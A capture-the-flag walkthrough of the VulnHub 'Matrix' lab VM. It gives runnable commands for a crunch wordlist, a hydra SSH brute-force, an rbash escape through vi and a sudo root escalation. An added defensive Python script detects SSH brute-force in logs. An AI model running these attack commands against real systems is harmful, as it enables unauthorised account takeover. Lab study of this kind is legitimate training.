Download
Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. Before you download, please read our FAQs sections dealing with the dangers of running unknown VMs and our suggestions for “protecting yourself and your network”. If you understand the risks, please download!
- Machine_Matrix.zip (Size: 552 MB)
- Download: https://mega.nz/#!CiwBjRZB!EtKOQvDQjytMq3LkkMgrHDC9EYxEz8mqpOg5M2N1OOk
- Download (Mirror): https://download.vulnhub.com/matrix/Machine_Matrix.zip
Information gathering
Host discovery
Kali IP: 192.168.87.128
Target IP: 192.168.87.142
Port scan
nmap -sV -p- 192.168.87.142
Ports 22, 80 and 31337 are open.
Directory brute-forcing
Web penetration
Visit port 80
Visit port 31337
The page contains a base64-encoded string:
ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=
Decoding it gives:
echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix
Look at Cypher.matrix
It is Brainfuck-encoded
Decoding it gives:
You can enter into matrix as guest, with password k1ll0rXX
Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.
In other words, the guest password is k1ll0r followed by two unknown characters.
Generating a matching wordlist with crunch is enough.
cat /usr/share/crunch/charset.lst
Choose which character set from the crunch charset file to use.
crunch 8 8 -f /usr/share/crunch/charset.lst lalpha-numeric -t k1ll0r@@ > pass.dic
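-f specifies the character set; -t gives the pattern, in which each @ is replaced by a character from that set.
Brute-force with hydra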
hydra -l guest -P pass.dic ssh://192.168.87.142
The login succeeds.
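From the defender's side, the hydra run above leaves a clear trace in the sshd log: a burst of failed logins for guest from one address, then a success. The following is an added example, not part of the original write-up, that flags both. The log lines, host name matrix, user alice, address 192.168.87.50, the year and the thresholds are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd log lines. 192.168.87.128 is the scanning host from the page;
# host "matrix", user "alice" and 192.168.87.50 are made up for the example.
_FMT = "Mar 10 14:{:02d}:{:02d} matrix sshd[900]: {} password for {} from {} port 40100 ssh2"
SAMPLE_LOG = "\n".join(
    [_FMT.format(2, s, "Failed", "guest", "192.168.87.128") for s in range(1, 9)]
    + [_FMT.format(2, 9, "Accepted", "guest", "192.168.87.128"),
       _FMT.format(5, 0, "Failed", "alice", "192.168.87.50"),    # a single typo
       _FMT.format(5, 10, "Accepted", "alice", "192.168.87.50")])

LINE = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+")

def detect(log_text, threshold=5, window=timedelta(seconds=60), year=2024):
    """Return alerts as (kind, source_ip, user, failures_in_window)."""
    recent = defaultdict(deque)   # (ip, user) -> timestamps of recent failures
    alerted = set()               # pairs already reported as a brute-force burst
    alerts = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        # Syslog timestamps carry no year, so one is assumed.
        ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
        outcome, user, ip = m.group(2), m.group(3), m.group(4)
        q = recent[(ip, user)]
        while q and ts - q[0] > window:     # drop failures outside the window
            q.popleft()
        if outcome == "Failed":
            q.append(ts)
            if len(q) >= threshold and (ip, user) not in alerted:
                alerted.add((ip, user))
                alerts.append(("bruteforce", ip, user, len(q)))
        elif len(q) >= threshold:
            # A login that succeeds right after a burst means a guessed password.
            alerts.append(("success_after_bruteforce", ip, user, len(q)))
            q.clear()
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The success_after_bruteforce alert is the one to act on first: it means the account's password is known to the source address and must be rotated.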
rbash escape
rbash differs from an ordinary shell in that it restricts certain actions, so some commands cannot be run.
An rbash escape is needed.
vi
:!/bin/bash
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Commands can now be executed.
Privilege escalation
sudo su root
The password just recovered by brute force was enough to escalate directly.
The flag can now be read.